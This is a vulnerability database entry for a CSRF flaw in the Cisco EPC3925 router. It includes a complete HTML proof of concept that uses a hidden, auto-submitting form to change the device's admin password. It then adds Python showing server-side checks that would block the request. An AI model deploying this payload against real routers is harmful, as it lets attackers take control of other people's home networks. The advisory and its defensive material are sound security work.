Cisco EPC3925 - Cross Site Request Forgery

2014-07-01T00:00:00
ID SSV:83763
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

<p>Cisco EPC3925 is a home wireless router made by Cisco (USA). The Cisco EPC3925 router contains a cross-site request forgery vulnerability caused by the goform/Quick_setup URL not properly validating requests. A remote attacker can exploit this vulnerability via the Password and PasswordReEnter parameters to change the password.</p>

#######################################################################
# Exploit Title: Cisco EPC3925 - Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com 
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925 
# CVE: N/A
#######################################################################
# Description:
# 
# This proof of concept demonstrates that the admin password can be 
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#            
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC: 
#
# <html>
#
# <form name="reseller" method="POST"
#   action="http://[target]/goform/Quick_setup" id="csrf_attack"
#   target="csrf_iframe">
#   <input type="hidden" name="Password" value="attackers_password">
#   <input type="hidden" name="PasswordReEnter" value="attackers_password">
#   <input type="hidden" name="save" value="Save Settings">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
#  document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#
# </html>
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/
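The following is an added example (not part of the advisory or of Cisco's firmware) showing the server-side checks that would have rejected the Quick_setup request above: an Origin/Referer check, a synchronizer CSRF token, and the current-password confirmation the advisory notes the device never asks for. The device address, the token field name and the CurrentPassword parameter are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlparse, parse_qs

DEVICE_ORIGIN = "http://192.168.0.1"  # assumed LAN address of the gateway


def issue_csrf_token(session):
    """Bind a fresh random token to the logged-in session (synchronizer-token pattern)."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(headers):
    """Accept only requests whose Origin (or Referer, for browsers that omit Origin) is the device."""
    origin = headers.get("Origin")
    if origin is None and "Referer" in headers:
        ref = urlparse(headers["Referer"])
        origin = f"{ref.scheme}://{ref.netloc}"
    return origin == DEVICE_ORIGIN


def check_quick_setup(headers, body, session):
    """Validate a POST to /goform/Quick_setup. Returns (accepted, reason)."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if not same_origin(headers):
        return False, "cross-origin request"
    expected = session.get("csrf_token", "")
    # compare_digest avoids timing leaks; an empty expected token must never match.
    if not expected or not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return False, "missing or invalid CSRF token"
    # The advisory notes the device never asks for the current password; require it here.
    if form.get("CurrentPassword") != session.get("password"):
        return False, "current password not confirmed"
    if not form.get("Password") or form.get("Password") != form.get("PasswordReEnter"):
        return False, "password fields empty or mismatched"
    return True, "ok"


# Constructed sample data. SESSION stands in for the authenticated admin session
# (storing the plaintext password here is a simplification for the demo).
SESSION = {"password": "correct-horse"}
# Mirrors the PoC form above: a cross-site POST with only Password, PasswordReEnter, save.
ATTACK_HEADERS = {"Origin": "http://attacker.example"}
ATTACK_BODY = "Password=attackers_password&PasswordReEnter=attackers_password&save=Save+Settings"


def legit_request(session):
    """Build the request a same-origin admin page would send after issue_csrf_token()."""
    token = issue_csrf_token(session)
    body = (f"CurrentPassword={session['password']}&Password=n3w-pass&PasswordReEnter=n3w-pass"
            f"&csrf_token={token}&save=Save+Settings")
    return {"Origin": DEVICE_ORIGIN}, body
```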